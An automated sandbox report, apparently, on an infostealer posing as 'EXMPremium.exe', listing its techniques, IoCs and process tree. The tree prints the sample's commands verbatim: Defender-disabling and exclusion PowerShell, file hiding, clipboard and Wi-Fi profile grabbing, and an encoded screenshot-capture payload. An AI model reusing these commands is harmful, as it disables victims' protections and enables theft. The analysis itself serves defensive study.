f8b0d56b3fc4db3786bb28f95b8103e2c66cd8628541c7a1d92f0f6fa5409000

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 11:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EXMPremium.exe
Size

8.8MB
MD5

828875cccd2706b67759e5c0b8126a6d
SHA1

6edf9ba8b9816304f7f06ebe139103103adedfc9
SHA256

f8b0d56b3fc4db3786bb28f95b8103e2c66cd8628541c7a1d92f0f6fa5409000
SHA512

54ff29feb80b763ac67695d29d48bb8401c3f37e62112de7357a3eb9fd982dcf09bc76ed9e4ef4d7e32f9127c1db30b98cd473992342c141dc76d778621848ee
SSDEEP

196608:ZgXMO0Q+hOuurErvI9pWjg/Qc+4o673pNrabeEeWa8yzWtPMYnNcsg:Cr0Q+RurEUWjZZ4dDLIewWzWtPTNzg

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3524	powershell.exe
396	powershell.exe
1736	powershell.exe
4152	powershell.exe
1660	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3776	cmd.exe
4468	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4068	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe
2144	EXMPremium.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4456	tasklist.exe
3052	tasklist.exe
1160	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3056	cmd.exe

UPX packed file 50 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023c37-67.dat	upx
behavioral2/memory/2144-70-0x00007FFFDD770000-0x00007FFFDDE35000-memory.dmp	upx
behavioral2/memory/2144-77-0x00007FFFF63D0000-0x00007FFFF63DF000-memory.dmp	upx
behavioral2/files/0x0016000000023c2d-76.dat	upx
behavioral2/memory/2144-75-0x00007FFFF1780000-0x00007FFFF17A5000-memory.dmp	upx
behavioral2/files/0x000a000000023b7f-130.dat	upx
behavioral2/files/0x000a000000023b7e-129.dat	upx
behavioral2/files/0x000a000000023b7c-128.dat	upx
behavioral2/files/0x0008000000023c48-127.dat	upx
behavioral2/files/0x0008000000023c46-126.dat	upx
behavioral2/files/0x0008000000023c45-125.dat	upx
behavioral2/memory/2144-136-0x00007FFFEC1C0000-0x00007FFFEC1DA000-memory.dmp	upx
behavioral2/memory/2144-138-0x00007FFFDD1C0000-0x00007FFFDD33F000-memory.dmp	upx
behavioral2/memory/2144-137-0x00007FFFEC190000-0x00007FFFEC1B4000-memory.dmp	upx
behavioral2/memory/2144-135-0x00007FFFEC450000-0x00007FFFEC47D000-memory.dmp	upx
behavioral2/memory/2144-141-0x00007FFFE37A0000-0x00007FFFE37D3000-memory.dmp	upx
behavioral2/memory/2144-140-0x00007FFFEC3C0000-0x00007FFFEC3CD000-memory.dmp	upx
behavioral2/memory/2144-146-0x00007FFFF1780000-0x00007FFFF17A5000-memory.dmp	upx
behavioral2/memory/2144-145-0x00007FFFDC440000-0x00007FFFDC969000-memory.dmp	upx
behavioral2/memory/2144-154-0x00007FFFDD410000-0x00007FFFDD52A000-memory.dmp	upx
behavioral2/memory/2144-153-0x00007FFFEC1C0000-0x00007FFFEC1DA000-memory.dmp	upx
behavioral2/memory/2144-231-0x00007FFFEC190000-0x00007FFFEC1B4000-memory.dmp	upx
behavioral2/memory/2144-270-0x00007FFFDD1C0000-0x00007FFFDD33F000-memory.dmp	upx
behavioral2/memory/2144-149-0x00007FFFEC100000-0x00007FFFEC10D000-memory.dmp	upx
behavioral2/memory/2144-148-0x00007FFFEC450000-0x00007FFFEC47D000-memory.dmp	upx
behavioral2/memory/2144-147-0x00007FFFF4670000-0x00007FFFF4684000-memory.dmp	upx
behavioral2/memory/2144-143-0x00007FFFDC970000-0x00007FFFDCA3D000-memory.dmp	upx
behavioral2/memory/2144-142-0x00007FFFDD770000-0x00007FFFDDE35000-memory.dmp	upx
behavioral2/memory/2144-139-0x00007FFFE6CF0000-0x00007FFFE6D09000-memory.dmp	upx
behavioral2/files/0x0008000000023c33-122.dat	upx
behavioral2/files/0x000b000000023c2c-121.dat	upx
behavioral2/files/0x000a000000023b7d-73.dat	upx
behavioral2/memory/2144-358-0x00007FFFE37A0000-0x00007FFFE37D3000-memory.dmp	upx
behavioral2/memory/2144-359-0x00007FFFDC970000-0x00007FFFDCA3D000-memory.dmp	upx
behavioral2/memory/2144-361-0x00007FFFDC440000-0x00007FFFDC969000-memory.dmp	upx
behavioral2/memory/2144-362-0x00007FFFDD770000-0x00007FFFDDE35000-memory.dmp	upx
behavioral2/memory/2144-387-0x00007FFFDC970000-0x00007FFFDCA3D000-memory.dmp	upx
behavioral2/memory/2144-386-0x00007FFFE37A0000-0x00007FFFE37D3000-memory.dmp	upx
behavioral2/memory/2144-385-0x00007FFFEC3C0000-0x00007FFFEC3CD000-memory.dmp	upx
behavioral2/memory/2144-384-0x00007FFFE6CF0000-0x00007FFFE6D09000-memory.dmp	upx
behavioral2/memory/2144-383-0x00007FFFDD1C0000-0x00007FFFDD33F000-memory.dmp	upx
behavioral2/memory/2144-382-0x00007FFFEC190000-0x00007FFFEC1B4000-memory.dmp	upx
behavioral2/memory/2144-381-0x00007FFFEC1C0000-0x00007FFFEC1DA000-memory.dmp	upx
behavioral2/memory/2144-380-0x00007FFFEC450000-0x00007FFFEC47D000-memory.dmp	upx
behavioral2/memory/2144-379-0x00007FFFF63D0000-0x00007FFFF63DF000-memory.dmp	upx
behavioral2/memory/2144-378-0x00007FFFF1780000-0x00007FFFF17A5000-memory.dmp	upx
behavioral2/memory/2144-377-0x00007FFFDC440000-0x00007FFFDC969000-memory.dmp	upx
behavioral2/memory/2144-376-0x00007FFFDD410000-0x00007FFFDD52A000-memory.dmp	upx
behavioral2/memory/2144-375-0x00007FFFEC100000-0x00007FFFEC10D000-memory.dmp	upx
behavioral2/memory/2144-374-0x00007FFFF4670000-0x00007FFFF4684000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5100	cmd.exe
2632	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4112	cmd.exe
5052	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2596	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2664	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2632	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3524	powershell.exe
1736	powershell.exe
3524	powershell.exe
396	powershell.exe
396	powershell.exe
396	powershell.exe
1736	powershell.exe
1736	powershell.exe
4468	powershell.exe
4468	powershell.exe
4180	powershell.exe
4180	powershell.exe
4468	powershell.exe
4180	powershell.exe
4152	powershell.exe
4152	powershell.exe
1392	powershell.exe
1392	powershell.exe
1660	powershell.exe
1660	powershell.exe
1892	powershell.exe
1892	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	3052	tasklist.exe
Token: SeDebugPrivilege	4456	tasklist.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeIncreaseQuotaPrivilege	1732	WMIC.exe
Token: SeSecurityPrivilege	1732	WMIC.exe
Token: SeTakeOwnershipPrivilege	1732	WMIC.exe
Token: SeLoadDriverPrivilege	1732	WMIC.exe
Token: SeSystemProfilePrivilege	1732	WMIC.exe
Token: SeSystemtimePrivilege	1732	WMIC.exe
Token: SeProfSingleProcessPrivilege	1732	WMIC.exe
Token: SeIncBasePriorityPrivilege	1732	WMIC.exe
Token: SeCreatePagefilePrivilege	1732	WMIC.exe
Token: SeBackupPrivilege	1732	WMIC.exe
Token: SeRestorePrivilege	1732	WMIC.exe
Token: SeShutdownPrivilege	1732	WMIC.exe
Token: SeDebugPrivilege	1732	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1732	WMIC.exe
Token: SeRemoteShutdownPrivilege	1732	WMIC.exe
Token: SeUndockPrivilege	1732	WMIC.exe
Token: SeManageVolumePrivilege	1732	WMIC.exe
Token: 33	1732	WMIC.exe
Token: 34	1732	WMIC.exe
Token: 35	1732	WMIC.exe
Token: 36	1732	WMIC.exe
Token: SeDebugPrivilege	1160	tasklist.exe
Token: SeDebugPrivilege	4180	powershell.exe
Token: SeIncreaseQuotaPrivilege	1732	WMIC.exe
Token: SeSecurityPrivilege	1732	WMIC.exe
Token: SeTakeOwnershipPrivilege	1732	WMIC.exe
Token: SeLoadDriverPrivilege	1732	WMIC.exe
Token: SeSystemProfilePrivilege	1732	WMIC.exe
Token: SeSystemtimePrivilege	1732	WMIC.exe
Token: SeProfSingleProcessPrivilege	1732	WMIC.exe
Token: SeIncBasePriorityPrivilege	1732	WMIC.exe
Token: SeCreatePagefilePrivilege	1732	WMIC.exe
Token: SeBackupPrivilege	1732	WMIC.exe
Token: SeRestorePrivilege	1732	WMIC.exe
Token: SeShutdownPrivilege	1732	WMIC.exe
Token: SeDebugPrivilege	1732	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1732	WMIC.exe
Token: SeRemoteShutdownPrivilege	1732	WMIC.exe
Token: SeUndockPrivilege	1732	WMIC.exe
Token: SeManageVolumePrivilege	1732	WMIC.exe
Token: 33	1732	WMIC.exe
Token: 34	1732	WMIC.exe
Token: 35	1732	WMIC.exe
Token: 36	1732	WMIC.exe
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 848 wrote to memory of 2144	848	EXMPremium.exe	83
PID 848 wrote to memory of 2144	848	EXMPremium.exe	83
PID 2144 wrote to memory of 4936	2144	EXMPremium.exe	84
PID 2144 wrote to memory of 4936	2144	EXMPremium.exe	84
PID 2144 wrote to memory of 3372	2144	EXMPremium.exe	85
PID 2144 wrote to memory of 3372	2144	EXMPremium.exe	85
PID 2144 wrote to memory of 3056	2144	EXMPremium.exe	86
PID 2144 wrote to memory of 3056	2144	EXMPremium.exe	86
PID 2144 wrote to memory of 3288	2144	EXMPremium.exe	89
PID 2144 wrote to memory of 3288	2144	EXMPremium.exe	89
PID 3056 wrote to memory of 2664	3056	cmd.exe	121
PID 3056 wrote to memory of 2664	3056	cmd.exe	121
PID 3288 wrote to memory of 396	3288	cmd.exe	93
PID 3288 wrote to memory of 396	3288	cmd.exe	93
PID 3372 wrote to memory of 1736	3372	cmd.exe	94
PID 3372 wrote to memory of 1736	3372	cmd.exe	94
PID 4936 wrote to memory of 3524	4936	cmd.exe	95
PID 4936 wrote to memory of 3524	4936	cmd.exe	95
PID 2144 wrote to memory of 4432	2144	EXMPremium.exe	96
PID 2144 wrote to memory of 4432	2144	EXMPremium.exe	96
PID 2144 wrote to memory of 812	2144	EXMPremium.exe	97
PID 2144 wrote to memory of 812	2144	EXMPremium.exe	97
PID 4432 wrote to memory of 4456	4432	cmd.exe	100
PID 4432 wrote to memory of 4456	4432	cmd.exe	100
PID 812 wrote to memory of 3052	812	cmd.exe	101
PID 812 wrote to memory of 3052	812	cmd.exe	101
PID 2144 wrote to memory of 112	2144	EXMPremium.exe	102
PID 2144 wrote to memory of 112	2144	EXMPremium.exe	102
PID 2144 wrote to memory of 3776	2144	EXMPremium.exe	104
PID 2144 wrote to memory of 3776	2144	EXMPremium.exe	104
PID 2144 wrote to memory of 4704	2144	EXMPremium.exe	106
PID 2144 wrote to memory of 4704	2144	EXMPremium.exe	106
PID 2144 wrote to memory of 3164	2144	EXMPremium.exe	109
PID 2144 wrote to memory of 3164	2144	EXMPremium.exe	109
PID 2144 wrote to memory of 4112	2144	EXMPremium.exe	111
PID 2144 wrote to memory of 4112	2144	EXMPremium.exe	111
PID 2144 wrote to memory of 2528	2144	EXMPremium.exe	113
PID 2144 wrote to memory of 2528	2144	EXMPremium.exe	113
PID 3776 wrote to memory of 4468	3776	cmd.exe	114
PID 3776 wrote to memory of 4468	3776	cmd.exe	114
PID 2144 wrote to memory of 4664	2144	EXMPremium.exe	116
PID 2144 wrote to memory of 4664	2144	EXMPremium.exe	116
PID 4704 wrote to memory of 1160	4704	cmd.exe	117
PID 4704 wrote to memory of 1160	4704	cmd.exe	117
PID 112 wrote to memory of 1732	112	cmd.exe	147
PID 112 wrote to memory of 1732	112	cmd.exe	147
PID 3164 wrote to memory of 676	3164	cmd.exe	120
PID 3164 wrote to memory of 676	3164	cmd.exe	120
PID 2528 wrote to memory of 2664	2528	cmd.exe	121
PID 2528 wrote to memory of 2664	2528	cmd.exe	121
PID 4664 wrote to memory of 4180	4664	cmd.exe	165
PID 4664 wrote to memory of 4180	4664	cmd.exe	165
PID 4112 wrote to memory of 5052	4112	cmd.exe	123
PID 4112 wrote to memory of 5052	4112	cmd.exe	123
PID 2144 wrote to memory of 1708	2144	EXMPremium.exe	124
PID 2144 wrote to memory of 1708	2144	EXMPremium.exe	124
PID 1708 wrote to memory of 2968	1708	cmd.exe	126
PID 1708 wrote to memory of 2968	1708	cmd.exe	126
PID 2144 wrote to memory of 3520	2144	EXMPremium.exe	127
PID 2144 wrote to memory of 3520	2144	EXMPremium.exe	127
PID 3520 wrote to memory of 2936	3520	cmd.exe	129
PID 3520 wrote to memory of 2936	3520	cmd.exe	129
PID 2144 wrote to memory of 1308	2144	EXMPremium.exe	130
PID 2144 wrote to memory of 1308	2144	EXMPremium.exe	130

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2664	attrib.exe

C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe
"C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:848
- C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe
  "C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3056
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe"
      4⤵
      Views/modifies file attributes
      PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:812
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:112
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3164
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4664
